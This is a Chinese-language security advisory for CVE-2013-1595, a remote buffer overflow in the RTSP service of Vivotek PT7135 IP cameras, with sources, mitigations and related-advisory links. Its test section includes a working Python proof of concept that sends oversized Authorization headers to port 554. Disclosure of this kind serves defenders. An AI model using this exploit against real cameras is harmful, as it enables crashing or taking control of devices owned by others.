多个Vivotek IP摄像机远程缓冲区溢出漏洞（CVE-2013-1595）

发布日期：2013-04-30
更新日期：2013-05-02受影响系统：
Vivotek PT7135 IP camera 0400a
Vivotek PT7135 IP camera 0300a
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 59573
CVE（CAN） ID: CVE-2013-1595

Vivotek是网络视频解决方案提供商。

Vivotek IP网络摄像头存在远程缓冲区溢出漏洞，通过向RTSP服务发送特制的报文，报文头字段Authorization完全用字符a （0x61）填充，攻击者可用0x61616161覆盖IP寄存器。

<*来源：Francisco Falcon
Nahuel Riva

链接：http://seclists.org/fulldisclosure/2013/Apr/252
http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
*>测试方法：
--------------------------------------------------------------------------------警告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
import socket, base64 cam_ip = "192.168.1.100"
session_descriptor = "live.sdp" request = "DESCRIBE rtsp://%s/%s RTSP/1.0 " % （cam_ip, session_descriptor）
request+= "CSeq: 1 "
request+= "Authorization: Basic %s "
request+= " " auth_little = "a" * 1000
auth_big = "a" * 10000 msgs = [request % auth_little, request % auth_big] for msg in msgs:
s = socket.socket（）
s.connect（（cam_ip, 554））
print s.send（msg）
print s.recv（0x10000）
s.close（）建议：
--------------------------------------------------------------------------------
临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 除非需要，不要将摄像机联网。
* 如果可能，过滤RTSP流（默认端口554）。
* 在HTTP请求中，至少有一个代理过滤 /../../ 、getparam.cgi
* 对 farseer.out 的每个请求，过滤参数 system.ntp 内的字符串。

厂商补丁：

Vivotek
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.vivotek.com/web/product/NetworkCameras.aspxIBM Sametime 客户端命令执行漏洞（CVE-2013-0553）IBM SPSS SamplePower c1sizer ActiveX控件缓冲区溢出漏洞（CVE-2012-5946）相关资讯 Vivotek

多个Vivotek IP摄像机命令注入漏洞（05/03/2013 07:11:23）
多个Vivotek IP摄像机目录遍历漏洞（05/02/2013 17:17:16）

多个Vivotek IP摄像机远程身份验证（05/03/2013 07:10:43）
Vivotek网络摄像机信息泄露漏洞（07/18/2012 09:35:59）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容